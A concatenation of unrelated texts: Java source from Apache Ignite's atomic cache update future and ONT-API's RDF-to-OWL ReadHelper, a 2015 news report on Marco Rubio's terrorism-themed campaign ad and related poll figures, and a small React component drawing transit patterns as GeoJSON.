{ @Override public void apply(final IgniteInternalFuture<AffinityTopologyVersion> fut) { cctx.kernalContext().closure().runLocalSafe(new Runnable() { @Override public void run() { try { AffinityTopologyVersion topVer = fut.get(); map(topVer); } catch (IgniteCheckedException e) { onDone(e); } } }); } }); return; } onDone(opRes0, err0); } /** * Updates near cache. * * @param req Update request. * @param res Update response. */ private void updateNear(GridNearAtomicAbstractUpdateRequest req, GridNearAtomicUpdateResponse res) { assert nearEnabled; if (res.remapKeys() != null || !req.hasPrimary()) return; GridNearAtomicCache near = (GridNearAtomicCache)cctx.dht().near(); near.processNearAtomicUpdateResponse(req, res); } /** {@inheritDoc} */ @Override protected void mapOnTopology() { cache.topology().readLock(); AffinityTopologyVersion topVer = null; try { if (cache.topology().stopping()) { onDone(new IgniteCheckedException("Failed to perform cache operation (cache is stopped): " + cache.name())); return; } GridDhtTopologyFuture fut = cache.topology().topologyVersionFuture(); if (fut.isDone()) { Throwable err = fut.validateCache(cctx); if (err != null) { onDone(err); return; } topVer = fut.topologyVersion(); } else { if (waitTopFut) { assert !topLocked : this; fut.listen(new CI1<IgniteInternalFuture<AffinityTopologyVersion>>() { @Override public void apply(IgniteInternalFuture<AffinityTopologyVersion> t) { cctx.kernalContext().closure().runLocalSafe(new Runnable() { @Override public void run() { mapOnTopology(); } }); } }); } else onDone(new GridCacheTryPutFailedException()); return; } } finally { cache.topology().readUnlock(); } map(topVer); } /** {@inheritDoc} */ protected void map(AffinityTopologyVersion topVer) { Collection<ClusterNode> topNodes = CU.affinityNodes(cctx, topVer); if (F.isEmpty(topNodes)) { onDone(new ClusterTopologyServerNotFoundException("Failed to map keys for cache (all partition nodes " + "left the grid).")); return; } Exception err = null; GridNearAtomicAbstractUpdateRequest singleReq0 = null; GridCacheVersion futVer = cctx.versions().next(topVer); GridCacheVersion updVer; // Assign version on near node in CLOCK ordering mode even if fastMap is false. if (cctx.config().getAtomicWriteOrderMode() == CLOCK) { updVer = this.updVer; if (updVer == null) { updVer = cctx.versions().next(topVer); if (log.isDebugEnabled()) log.debug("Assigned fast-map version for update on near node: " + updVer); } } else updVer = null; try { singleReq0 = mapSingleUpdate(topVer, futVer, updVer); synchronized (mux) { assert this.futVer == null : this; assert this.topVer == AffinityTopologyVersion.ZERO : this; this.topVer = topVer; this.updVer = updVer; this.futVer = futVer; resCnt = 0; req = singleReq0; } } catch (Exception e) { err = e; } if (err != null) { onDone(err); return; } if (storeFuture()) { if (!cctx.mvcc().addAtomicFuture(futVer, this)) { assert isDone() : this; return; } } // Optimize mapping for single key. mapSingle(singleReq0.nodeId(), singleReq0); } /** * @return Future version. */ GridCacheVersion onFutureDone() { GridCacheVersion ver0; GridFutureAdapter<Void> fut0; synchronized (mux) { fut0 = topCompleteFut; topCompleteFut = null; ver0 = futVer; futVer = null; } if (fut0 != null) fut0.onDone(); return ver0; } /** * @param topVer Topology version. * @param futVer Future version. * @param updVer Update version. * @return Request. * @throws Exception If failed. */ private GridNearAtomicAbstractUpdateRequest mapSingleUpdate(AffinityTopologyVersion topVer, GridCacheVersion futVer, @Nullable GridCacheVersion updVer) throws Exception { if (key == null) throw new NullPointerException("Null key."); Object val = this.val; if (val == null && op != GridCacheOperation.DELETE) throw new NullPointerException("Null value."); KeyCacheObject cacheKey = cctx.toCacheKeyObject(key); if (op != TRANSFORM) val = cctx.toCacheObject(val); else val = EntryProcessorResourceInjectorProxy.wrap(cctx.kernalContext(), (EntryProcessor)val); ClusterNode primary = cctx.affinity().primary(cacheKey, topVer); if (primary == null) throw new ClusterTopologyServerNotFoundException("Failed to map keys for cache (all partition nodes " + "left the grid)."); GridNearAtomicAbstractUpdateRequest req; if (canUseSingleRequest(primary)) { if (op == TRANSFORM) { req = new GridNearAtomicSingleUpdateInvokeRequest( cctx.cacheId(), primary.id(), futVer, false, updVer, topVer, topLocked, syncMode, op, retval, invokeArgs, subjId, taskNameHash, skipStore, keepBinary, cctx.kernalContext().clientNode(), cctx.deploymentEnabled()); } else { if (filter == null || filter.length == 0) { req = new GridNearAtomicSingleUpdateRequest( cctx.cacheId(), primary.id(), futVer, false, updVer, topVer, topLocked, syncMode, op, retval, subjId, taskNameHash, skipStore, keepBinary, cctx.kernalContext().clientNode(), cctx.deploymentEnabled()); } else { req = new GridNearAtomicSingleUpdateFilterRequest( cctx.cacheId(), primary.id(), futVer, false, updVer, topVer, topLocked, syncMode, op, retval, filter, subjId, taskNameHash, skipStore, keepBinary, cctx.kernalContext().clientNode(), cctx.deploymentEnabled()); } } } else { req = new GridNearAtomicFullUpdateRequest( cctx.cacheId(), primary.id(), futVer, false, updVer, topVer, topLocked, syncMode, op, retval, expiryPlc, invokeArgs, filter, subjId, taskNameHash, skipStore, keepBinary, cctx.kernalContext().clientNode(), cctx.deploymentEnabled(), 1); } req.addUpdateEntry(cacheKey, val, CU.TTL_NOT_CHANGED, CU.EXPIRE_TIME_CALCULATE, null, true); return req; } /** * @param node Target node * @return {@code True} can use 'single' update requests. */ private boolean canUseSingleRequest(ClusterNode node) { return expiryPlc == null && node != null && node.version().compareToIgnoreTimestamp(SINGLE_UPDATE_REQUEST) >= 0; } /** {@inheritDoc} */ public String toString() { synchronized (mux) { return S.toString(GridNearAtomicSingleUpdateFuture.class, this, super.toString()); } } }
/** * Helper to translate rdf-graph to the owl-objects form. * <p> * Created by @szuev on 25.11.2016. */ @SuppressWarnings("WeakerAccess") public class ReadHelper { /** * Auxiliary method for simplification code. * Used in Annotation Translators. * If the specified statement also belongs to the another type of axiom * and such situation is prohibited in the config then returns {@code false}. * This is for three kinds of statements: * <ul> * <li>{@code A1 rdfs:subPropertyOf A2}</li> * <li>{@code A rdfs:domain U}</li> * <li>{@code A rdfs:range U}</li> * </ul> * Each of them is wider than the analogous statement for object or data property, * e.g. {@code P rdfs:range C} could be treated as {@code A rdfs:range U}, but not vice versa. * * @param statement {@link OntStatement} to test * @param conf {@link InternalConfig} * @param o {@link AxiomType#SUB_OBJECT_PROPERTY} * or {@link AxiomType#OBJECT_PROPERTY_DOMAIN} * or {@link AxiomType#OBJECT_PROPERTY_RANGE} * @param d {@link AxiomType#SUB_DATA_PROPERTY} * or {@link AxiomType#DATA_PROPERTY_DOMAIN} * or {@link AxiomType#DATA_PROPERTY_RANGE} * @return {@code true} if the statement is good to be represented in the form of annotation axiom */ public static boolean testAnnotationAxiomOverlaps(OntStatement statement, InternalConfig conf, AxiomType<? extends OWLObjectPropertyAxiom> o, AxiomType<? extends OWLDataPropertyAxiom> d) { return !conf.isIgnoreAnnotationAxiomOverlaps() || Iter.noneMatch(Iter.of(o, d).mapWith(AxiomParserProvider::get), a -> a.testStatement(statement, conf)); } /** * Answers {@code true} if the given {@link OntStatement} is a declaration (predicate = {@code rdf:type}) * of some OWL entity or anonymous individual. * * @param s {@link OntStatement} to test * @return boolean */ public static boolean isDeclarationStatement(OntStatement s) { return s.isDeclaration() && isEntityOrAnonymousIndividual(s.getSubject()); } /** * Answers {@code true} if the given {@link Resource} is an OWL-Entity or Anonymous Individual * * @param o {@link Resource} * @return boolean */ public static boolean isEntityOrAnonymousIndividual(Resource o) { return o.isURIResource() || o.canAs(OntIndividual.Anonymous.class); } /** * Answers if the given {@link OntStatement} can be considered as annotation property assertion. * * @param s {@link OntStatement}, not {@code null} * @param config {@link InternalConfig}, not {@code null} * @return {@code true} if the specified statement is annotation property assertion */ public static boolean isAnnotationAssertionStatement(OntStatement s, InternalConfig config) { return s.isAnnotation() && !s.isBulkAnnotation() && (config.isAllowBulkAnnotationAssertions() || !s.hasAnnotations()); } /** * Lists all {@link OWLAnnotation}s which are associated with the specified statement. * All {@code OWLAnnotation}s are provided in the form of {@link ONTObject}-wrappers. * * @param statement {@link OntStatement}, axiom root statement, not {@code null} * @param conf {@link InternalConfig} * @param of {@link InternalObjectFactory} * @return a set of wraps {@link ONTObject} around {@link OWLAnnotation} */ public static ExtendedIterator<ONTObject<OWLAnnotation>> listAnnotations(OntStatement statement, InternalConfig conf, InternalObjectFactory of) { ExtendedIterator<OntStatement> res = OntModels.listAnnotations(statement); if (conf.isLoadAnnotationAxioms() && isDeclarationStatement(statement)) { // for compatibility with OWL-API skip all plain annotations attached to an entity (or anonymous individual) // they would go separately as annotation-assertions. res = res.filterDrop(s -> isAnnotationAssertionStatement(s, conf)); } return res.mapWith(of::getAnnotation); } /** * Lists all annotations related to the object (including assertions). * * @param obj {@link OntObject} * @param of {@link InternalObjectFactory} * @return {@link ExtendedIterator} of {@link ONTObject}s of {@link OWLAnnotation} */ public static ExtendedIterator<ONTObject<OWLAnnotation>> listOWLAnnotations(OntObject obj, InternalObjectFactory of) { return OntModels.listAnnotations(obj).mapWith(of::getAnnotation); } /** * Translates {@link OntStatement} to {@link ONTObject} encapsulated {@link OWLAnnotation}. * * @param ann {@link OntStatement} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link OWLAnnotation} */ public static ONTObject<OWLAnnotation> getAnnotation(OntStatement ann, InternalObjectFactory of) { return ann.getSubject().getAs(OntAnnotation.class) != null || ann.hasAnnotations() ? getHierarchicalAnnotations(ann, of) : getPlainAnnotation(ann, of); } private static ONTObject<OWLAnnotation> getPlainAnnotation(OntStatement ann, InternalObjectFactory of) { ONTObject<OWLAnnotationProperty> p = of.getProperty(ann.getPredicate().as(OntNAP.class)); ONTObject<? extends OWLAnnotationValue> v = of.getValue(ann.getObject()); OWLAnnotation res = of.getOWLDataFactory().getOWLAnnotation(p.getOWLObject(), v.getOWLObject(), Stream.empty()); return ONTWrapperImpl.create(res, ann).append(p).append(v); } private static ONTObject<OWLAnnotation> getHierarchicalAnnotations(OntStatement root, InternalObjectFactory of) { OntObject subject = root.getSubject(); ONTObject<OWLAnnotationProperty> p = of.getProperty(root.getPredicate().as(OntNAP.class)); ONTObject<? extends OWLAnnotationValue> v = of.getValue(root.getObject()); Set<? extends ONTObject<OWLAnnotation>> children = OntModels.listAnnotations(root) .mapWith(a -> getHierarchicalAnnotations(a, of)).toSet(); OWLAnnotation object = of.getOWLDataFactory() .getOWLAnnotation(p.getOWLObject(), v.getOWLObject(), children.stream().map(ONTObject::getOWLObject)); ONTWrapperImpl<OWLAnnotation> res = ONTWrapperImpl.create(object, root); OntAnnotation a; if ((a = subject.getAs(OntAnnotation.class)) != null) { res = res.append(a); } return res.append(p).append(v).append(children); } /** * Maps {@link OntFR} =&gt; {@link OWLFacetRestriction}. * * @param fr {@link OntFR}, not {@code null} * @param of {@link InternalObjectFactory}, not {@code null} * @return {@link ONTObject} around {@link OWLFacetRestriction} */ public static ONTObject<OWLFacetRestriction> getFacetRestriction(OntFR fr, InternalObjectFactory of) { OWLFacetRestriction res = calcOWLFacetRestriction(fr, of); return ONTWrapperImpl.create(res, fr); } /** * Creates an {@link OWLFacetRestriction} instance. * * @param fr {@link OntFR}, not {@code null} * @param of {@link InternalObjectFactory}, not {@code null} * @return {@link OWLFacetRestriction} */ public static OWLFacetRestriction calcOWLFacetRestriction(OntFR fr, InternalObjectFactory of) { OWLLiteral literal = of.getLiteral(OntApiException.notNull(fr, "Null facet restriction.").getValue()).getOWLObject(); Class<? extends OntFR> type = OntModels.getOntType(fr); return of.getOWLDataFactory().getOWLFacetRestriction(getFacet(type), literal); } /** * Gets the facet by ONT-API type. * * @param type {@code Class}-type of {@link OntFR} * @return {@link OWLFacet} * @see WriteHelper#getFRType(OWLFacet) */ public static OWLFacet getFacet(Class<? extends OntFR> type) { if (OntFR.Length.class == type) return OWLFacet.LENGTH; if (OntFR.MinLength.class == type) return OWLFacet.MIN_LENGTH; if (OntFR.MaxLength.class == type) return OWLFacet.MAX_LENGTH; if (OntFR.MinInclusive.class == type) return OWLFacet.MIN_INCLUSIVE; if (OntFR.MaxInclusive.class == type) return OWLFacet.MAX_INCLUSIVE; if (OntFR.MinExclusive.class == type) return OWLFacet.MIN_EXCLUSIVE; if (OntFR.MaxExclusive.class == type) return OWLFacet.MAX_EXCLUSIVE; if (OntFR.Pattern.class == type) return OWLFacet.PATTERN; if (OntFR.FractionDigits.class == type) return OWLFacet.FRACTION_DIGITS; if (OntFR.TotalDigits.class == type) return OWLFacet.TOTAL_DIGITS; if (OntFR.LangRange.class == type) return OWLFacet.LANG_RANGE; throw new OntApiException.IllegalArgument("Unsupported facet restriction " + type); } /** * Calculates an {@link OWLDataRange} wrapped by {@link ONTObject}. * Note: this method is recursive. * * @param dr {@link OntDR Ontology Data Range} to map * @param of {@link InternalObjectFactory} * @param seen Set of {@link Resource} * @return {@link ONTObject} around {@link OWLDataRange} * @throws OntApiException if something is wrong. */ @SuppressWarnings("unchecked") public static ONTObject<? extends OWLDataRange> calcDataRange(OntDR dr, InternalObjectFactory of, Set<Resource> seen) { if (OntApiException.notNull(dr, "Null data range").isURIResource()) { return of.getDatatype(dr.as(OntDT.class)); } if (seen.contains(dr)) { throw new OntApiException("Recursive loop on data range " + dr); } seen.add(dr); DataFactory df = of.getOWLDataFactory(); if (dr instanceof OntDR.Restriction) { OntDR.Restriction _dr = (OntDR.Restriction) dr; ONTObject<OWLDatatype> d = of.getDatatype(_dr.getValue()); Set<ONTObject<OWLFacetRestriction>> restrictions = OntModels.listMembers(_dr.getList()) .mapWith(of::getFacetRestriction).toSet(); OWLDataRange res = df.getOWLDatatypeRestriction(d.getOWLObject(), restrictions.stream().map(ONTObject::getOWLObject).collect(Collectors.toList())); return ONTWrapperImpl.create(res, dr).append(restrictions); } if (dr instanceof OntDR.ComplementOf) { OntDR.ComplementOf _dr = (OntDR.ComplementOf) dr; ONTObject<? extends OWLDataRange> d = calcDataRange(_dr.getValue(), of, seen); return ONTWrapperImpl.create(df.getOWLDataComplementOf(d.getOWLObject()), _dr).append(d); } if (dr instanceof OntDR.UnionOf || dr instanceof OntDR.IntersectionOf) { OntDR.ComponentsDR<OntDR> _dr = (OntDR.ComponentsDR<OntDR>) dr; Set<ONTObject<OWLDataRange>> dataRanges = OntModels.listMembers(_dr.getList()) .mapWith(d -> (ONTObject<OWLDataRange>) calcDataRange(d, of, seen)).toSet(); OWLDataRange res = dr instanceof OntDR.UnionOf ? df.getOWLDataUnionOf(dataRanges.stream().map(ONTObject::getOWLObject)) : df.getOWLDataIntersectionOf(dataRanges.stream().map(ONTObject::getOWLObject)); return ONTWrapperImpl.create(res, dr).append(dataRanges); } if (dr instanceof OntDR.OneOf) { OntDR.OneOf _dr = (OntDR.OneOf) dr; Set<ONTObject<OWLLiteral>> literals = _dr.getList().members().map(of::getLiteral) .collect(Collectors.toSet()); OWLDataRange res = df.getOWLDataOneOf(literals.stream().map(ONTObject::getOWLObject)); return ONTWrapperImpl.create(res, _dr); } throw new OntApiException("Unsupported data range expression " + dr); } /** * Calculates an {@link OWLClassExpression} wrapped by {@link ONTObject}. * Note: this method is recursive. * * @param ce {@link OntCE Ontology Class Expression} to map * @param of {@link InternalObjectFactory} * @param seen Set of {@link Resource}, * a subsidiary collection to prevent possible graph recursions * (e.g. {@code _:b0 owl:complementOf _:b0}) * @return {@link ONTObject} around {@link OWLClassExpression} * @throws OntApiException if something is wrong. */ @SuppressWarnings("unchecked") public static ONTObject<? extends OWLClassExpression> calcClassExpression(OntCE ce, InternalObjectFactory of, Set<Resource> seen) { if (OntApiException.notNull(ce, "Null class expression").isURIResource()) { return of.getClass(ce.as(OntClass.class)); } if (!seen.add(ce)) { throw new OntApiException("Recursive loop on class expression " + ce); } DataFactory df = of.getOWLDataFactory(); Class<? extends OntObject> type = OntModels.getOntType(ce); if (OntCE.ObjectSomeValuesFrom.class.equals(type) || OntCE.ObjectAllValuesFrom.class.equals(type)) { OntCE.ComponentRestrictionCE<OntCE, OntOPE> _ce = (OntCE.ComponentRestrictionCE<OntCE, OntOPE>) ce; ONTObject<? extends OWLObjectPropertyExpression> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLClassExpression> c = calcClassExpression(_ce.getValue(), of, seen); OWLClassExpression owl; if (OntCE.ObjectSomeValuesFrom.class.equals(type)) { owl = df.getOWLObjectSomeValuesFrom(p.getOWLObject(), c.getOWLObject()); } else { owl = df.getOWLObjectAllValuesFrom(p.getOWLObject(), c.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(c); } if (OntCE.DataSomeValuesFrom.class.equals(type) || OntCE.DataAllValuesFrom.class.equals(type)) { OntCE.ComponentRestrictionCE<OntDR, OntNDP> _ce = (OntCE.ComponentRestrictionCE<OntDR, OntNDP>) ce; ONTObject<OWLDataProperty> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLDataRange> d = of.getDatatype(_ce.getValue()); OWLClassExpression owl; if (OntCE.DataSomeValuesFrom.class.equals(type)) { owl = df.getOWLDataSomeValuesFrom(p.getOWLObject(), d.getOWLObject()); } else { owl = df.getOWLDataAllValuesFrom(p.getOWLObject(), d.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(d); } if (OntCE.ObjectHasValue.class.equals(type)) { OntCE.ObjectHasValue _ce = (OntCE.ObjectHasValue) ce; ONTObject<? extends OWLObjectPropertyExpression> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLIndividual> i = of.getIndividual(_ce.getValue()); return ONTWrapperImpl.create(df.getOWLObjectHasValue(p.getOWLObject(), i.getOWLObject()), _ce).append(p).append(i); } if (OntCE.DataHasValue.class.equals(type)) { OntCE.DataHasValue _ce = (OntCE.DataHasValue) ce; ONTObject<OWLDataProperty> p = of.getProperty(_ce.getProperty()); ONTObject<OWLLiteral> l = of.getLiteral(_ce.getValue()); return ONTWrapperImpl.create(df.getOWLDataHasValue(p.getOWLObject(), l.getOWLObject()), _ce).append(p); } if (OntCE.ObjectMinCardinality.class.equals(type) || OntCE.ObjectMaxCardinality.class.equals(type) || OntCE.ObjectCardinality.class.equals(type)) { OntCE.CardinalityRestrictionCE<OntCE, OntOPE> _ce = (OntCE.CardinalityRestrictionCE<OntCE, OntOPE>) ce; ONTObject<? extends OWLObjectPropertyExpression> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLClassExpression> c = calcClassExpression(_ce.getValue() == null ? _ce.getModel().getOWLThing() : _ce.getValue(), of, seen); OWLObjectCardinalityRestriction owl; if (OntCE.ObjectMinCardinality.class.equals(type)) { owl = df.getOWLObjectMinCardinality(_ce.getCardinality(), p.getOWLObject(), c.getOWLObject()); } else if (OntCE.ObjectMaxCardinality.class.equals(type)) { owl = df.getOWLObjectMaxCardinality(_ce.getCardinality(), p.getOWLObject(), c.getOWLObject()); } else { owl = df.getOWLObjectExactCardinality(_ce.getCardinality(), p.getOWLObject(), c.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(c); } if (OntCE.DataMinCardinality.class.equals(type) || OntCE.DataMaxCardinality.class.equals(type) || OntCE.DataCardinality.class.equals(type)) { OntCE.CardinalityRestrictionCE<OntDR, OntNDP> _ce = (OntCE.CardinalityRestrictionCE<OntDR, OntNDP>) ce; ONTObject<OWLDataProperty> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLDataRange> d = of.getDatatype(_ce.getValue() == null ? _ce.getModel().getOntEntity(OntDT.class, RDFS.Literal) : _ce.getValue()); OWLDataCardinalityRestriction owl; if (OntCE.DataMinCardinality.class.equals(type)) { owl = df.getOWLDataMinCardinality(_ce.getCardinality(), p.getOWLObject(), d.getOWLObject()); } else if (OntCE.DataMaxCardinality.class.equals(type)) { owl = df.getOWLDataMaxCardinality(_ce.getCardinality(), p.getOWLObject(), d.getOWLObject()); } else { owl = df.getOWLDataExactCardinality(_ce.getCardinality(), p.getOWLObject(), d.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(d); } if (OntCE.HasSelf.class.equals(type)) { OntCE.HasSelf _ce = (OntCE.HasSelf) ce; ONTObject<? extends OWLObjectPropertyExpression> p = of.getProperty(_ce.getProperty()); return ONTWrapperImpl.create(df.getOWLObjectHasSelf(p.getOWLObject()), _ce).append(p); } if (OntCE.UnionOf.class.equals(type) || OntCE.IntersectionOf.class.equals(type)) { OntCE.ComponentsCE<OntCE> _ce = (OntCE.ComponentsCE<OntCE>) ce; Set<ONTObject<OWLClassExpression>> components = OntModels.listMembers(_ce.getList()) .mapWith(c -> (ONTObject<OWLClassExpression>) calcClassExpression(c, of, seen)) .toSet(); OWLClassExpression owl; if (OntCE.UnionOf.class.equals(type)) { owl = df.getOWLObjectUnionOf(components.stream().map(ONTObject::getOWLObject)); } else { owl = df.getOWLObjectIntersectionOf(components.stream().map(ONTObject::getOWLObject)); } return ONTWrapperImpl.create(owl, _ce).append(components); } if (OntCE.OneOf.class.equals(type)) { OntCE.OneOf _ce = (OntCE.OneOf) ce; Set<ONTObject<OWLIndividual>> components = OntModels.listMembers(_ce.getList()) .mapWith(i -> (ONTObject<OWLIndividual>) of.getIndividual(i)).toSet(); OWLClassExpression owl = df.getOWLObjectOneOf(components.stream().map(ONTObject::getOWLObject)); return ONTWrapperImpl.create(owl, _ce).append(components); } if (ce instanceof OntCE.ComplementOf) { OntCE.ComplementOf _ce = (OntCE.ComplementOf) ce; ONTObject<? extends OWLClassExpression> c = calcClassExpression(_ce.getValue(), of, seen); return ONTWrapperImpl.create(df.getOWLObjectComplementOf(c.getOWLObject()), _ce).append(c); } if (ce instanceof OntCE.NaryRestrictionCE) { OntCE.NaryRestrictionCE<OntDR, OntNDP> _ce = (OntCE.NaryRestrictionCE<OntDR, OntNDP>) ce; ONTObject<OWLDataProperty> p = of.getProperty(_ce.getProperty()); ONTObject<? extends OWLDataRange> d = of.getDatatype(_ce.getValue()); OWLClassExpression owl; if (OntCE.NaryDataSomeValuesFrom.class.equals(type)) { owl = df.getOWLDataSomeValuesFrom(p.getOWLObject(), d.getOWLObject()); } else { owl = df.getOWLDataAllValuesFrom(p.getOWLObject(), d.getOWLObject()); } return ONTWrapperImpl.create(owl, _ce).append(p).append(d); } throw new OntApiException("Unsupported class expression " + ce); } /** * @param var {@link OntSWRL.Variable} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link SWRLVariable} */ public static ONTObject<SWRLVariable> getSWRLVariable(OntSWRL.Variable var, InternalObjectFactory of) { if (!OntApiException.notNull(var, "Null swrl var").isURIResource()) { throw new OntApiException("Anonymous swrl var " + var); } return ONTWrapperImpl.create(of.getOWLDataFactory().getSWRLVariable(of.toIRI(var.getURI())), var); } /** * @param arg {@link OntSWRL.DArg} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link SWRLDArgument} */ public static ONTObject<? extends SWRLDArgument> getSWRLLiteralArg(OntSWRL.DArg arg, InternalObjectFactory of) { if (OntApiException.notNull(arg, "Null SWRL-D arg").isLiteral()) { return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLLiteralArgument(of.getLiteral(arg.asLiteral()).getOWLObject()), arg); } if (arg.canAs(OntSWRL.Variable.class)) { return of.getSWRLVariable(arg.as(OntSWRL.Variable.class)); } throw new OntApiException("Unsupported SWRL-D arg " + arg); } /** * @param arg {@link OntSWRL.IArg} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link SWRLIArgument} */ public static ONTObject<? extends SWRLIArgument> getSWRLIndividualArg(OntSWRL.IArg arg, InternalObjectFactory of) { if (OntApiException.notNull(arg, "Null SWRL-I arg").canAs(OntIndividual.class)) { return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLIndividualArgument(of.getIndividual(arg.as(OntIndividual.class)).getOWLObject()), arg); } if (arg.canAs(OntSWRL.Variable.class)) { return of.getSWRLVariable(arg.as(OntSWRL.Variable.class)); } throw new OntApiException("Unsupported SWRL-I arg " + arg); } /** * @param atom {@link OntSWRL.Atom} * @param of {@link InternalObjectFactory} * @return {@link ONTObject} around {@link SWRLAtom} */ public static ONTObject<? extends SWRLAtom> calcSWRLAtom(OntSWRL.Atom atom, InternalObjectFactory of) { if (atom instanceof OntSWRL.Atom.BuiltIn) { OntSWRL.Atom.BuiltIn _atom = (OntSWRL.Atom.BuiltIn) atom; IRI iri = of.toIRI(_atom.getPredicate().getURI()); List<ONTObject<? extends SWRLDArgument>> arguments = _atom.arguments().map(of::getSWRLArgument) .collect(Collectors.toList()); SWRLAtom res = of.getOWLDataFactory().getSWRLBuiltInAtom(iri, arguments.stream().map(ONTObject::getOWLObject) .collect(Collectors.toList())); return ONTWrapperImpl.create(res, _atom).appendWildcards(arguments); } if (atom instanceof OntSWRL.Atom.OntClass) { OntSWRL.Atom.OntClass _atom = (OntSWRL.Atom.OntClass) atom; ONTObject<? extends OWLClassExpression> c = of.getClass(_atom.getPredicate()); ONTObject<? extends SWRLIArgument> a = of.getSWRLArgument(_atom.getArg()); return ONTWrapperImpl.create(of.getOWLDataFactory().getSWRLClassAtom(c.getOWLObject(), a.getOWLObject()), _atom) .append(c).append(a); } if (atom instanceof OntSWRL.Atom.DataProperty) { OntSWRL.Atom.DataProperty _atom = (OntSWRL.Atom.DataProperty) atom; ONTObject<OWLDataProperty> p = of.getProperty(_atom.getPredicate()); ONTObject<? extends SWRLIArgument> f = of.getSWRLArgument(_atom.getFirstArg()); ONTObject<? extends SWRLDArgument> s = of.getSWRLArgument(_atom.getSecondArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLDataPropertyAtom(p.getOWLObject(), f.getOWLObject(), s.getOWLObject()), _atom) .append(p).append(f).append(s); } if (atom instanceof OntSWRL.Atom.ObjectProperty) { OntSWRL.Atom.ObjectProperty _atom = (OntSWRL.Atom.ObjectProperty) atom; ONTObject<? extends OWLObjectPropertyExpression> p = of.getProperty(_atom.getPredicate()); ONTObject<? extends SWRLIArgument> f = of.getSWRLArgument(_atom.getFirstArg()); ONTObject<? extends SWRLIArgument> s = of.getSWRLArgument(_atom.getSecondArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLObjectPropertyAtom(p.getOWLObject(), f.getOWLObject(), s.getOWLObject()), _atom) .append(p).append(f).append(s); } if (atom instanceof OntSWRL.Atom.DataRange) { OntSWRL.Atom.DataRange _atom = (OntSWRL.Atom.DataRange) atom; ONTObject<? extends OWLDataRange> d = of.getDatatype(_atom.getPredicate()); ONTObject<? extends SWRLDArgument> a = of.getSWRLArgument(_atom.getArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLDataRangeAtom(d.getOWLObject(), a.getOWLObject()), _atom).append(d).append(a); } if (atom instanceof OntSWRL.Atom.DifferentIndividuals) { OntSWRL.Atom.DifferentIndividuals _atom = (OntSWRL.Atom.DifferentIndividuals) atom; ONTObject<? extends SWRLIArgument> f = of.getSWRLArgument(_atom.getFirstArg()); ONTObject<? extends SWRLIArgument> s = of.getSWRLArgument(_atom.getSecondArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLDifferentIndividualsAtom(f.getOWLObject(), s.getOWLObject()), _atom).append(f).append(s); } if (atom instanceof OntSWRL.Atom.SameIndividuals) { OntSWRL.Atom.SameIndividuals _atom = (OntSWRL.Atom.SameIndividuals) atom; ONTObject<? extends SWRLIArgument> f = of.getSWRLArgument(_atom.getFirstArg()); ONTObject<? extends SWRLIArgument> s = of.getSWRLArgument(_atom.getSecondArg()); return ONTWrapperImpl.create(of.getOWLDataFactory() .getSWRLSameIndividualAtom(f.getOWLObject(), s.getOWLObject()), _atom).append(f).append(s); } throw new OntApiException("Unsupported SWRL atom " + atom); } }
Florida Sen. Marco Rubio has released the first television ad of his Republican presidential campaign, warning Americans that terror attacks like the ones that happened in Paris could happen in the United States. “This is a civilizational struggle between the values of freedom and liberty and radical Islamic terror,” Rubio says in the 30-second spot scheduled to begin airing nationally on Tuesday. “What happened in Paris could happen here.” “There is no middle ground,” the GOP candidate continues. “These aren’t disgruntled or disempowered people. These are radical terrorists who want to kill us, because we let women drive, because we let girls go to school.” He adds: “I’m Marco Rubio. I approve this message because there can be no arrangement or negotiation. Either they win or we do.” According to an ABC News/Washington Post national poll released Sunday, Rubio (11 percent) currently sits in third place, trailing frontrunner Donald Trump (32 percent) and retired neurosurgeon Ben Carson (22 percent) in the race for the Republican nomination. The Florida senator is also the only candidate other than Trump and Carson to register double-digit support among GOP voters. Meanwhile, most voters trust former Secretary of State Hillary Clinton to handle terrorism more than any of the three leading GOP candidates. Who would trust more to handle terrorism? • Hillary Clinton: 50 percent • Donald Trump: 42 percent • Hillary Clinton: 49 percent • Ben Carson: 40 percent • Hillary Clinton: 47 percent • Marco Rubio: 43 percent Source: ABC News/Washington Post survey, Nov. 16-19, 2015 The poll also found a vast majority of Americans (81 percent) “think it is likely that there will be a terrorist attack in the U.S. in the near future that will cause large numbers of lives to be lost.” Just 18 percent of Americans do not think such an attack is likely to occur. In an interview with “Fox News Sunday,” Rubio said it’s obvious why the United States is a target for terror. “The United States is the ultimate prize in their mind,” he said. “If ISIS is able to conduct a successful operation in the U.S., or I believe even Canada for that matter, of the scale of what you saw in Paris, it would be an enormous bonanza for them in terms of funding but also recruits from all over the world; that would be a huge messaging win for ISIS and continue to grow their movement.” Rubio’s plan to fight them includes expanding air strikes and embedding U.S. forces with Sunni and Kurdish forces on the ground in Syria. “We need a ground force that defeats ISIS, and it should made up primarily of Arab Sunnis,” he said. “That’s the only way you’re going to defeat them. They have to be defeated by Arab Sunnis themselves. So, they’re going to be the bulk of the ground force. There will have to be American operators embedded alongside them — special operators are combat troops.” But Rubio added that the number of U.S. ground forces his plan calls for would not reach the levels of previous U.S. operations. “This is not a return to Iraq,” he said.
import KeyedGeoJSON from './geojson' /** * Display patterns as GeoJSON on Leaflet. */ export default function Patterns({ color, patterns }: { color: string patterns: GTFS.Pattern[] }) { return ( <> {patterns.map((p) => ( <KeyedGeoJSON color={color} data={p.geometry} key={p._id} weight={3} /> ))} </> ) }
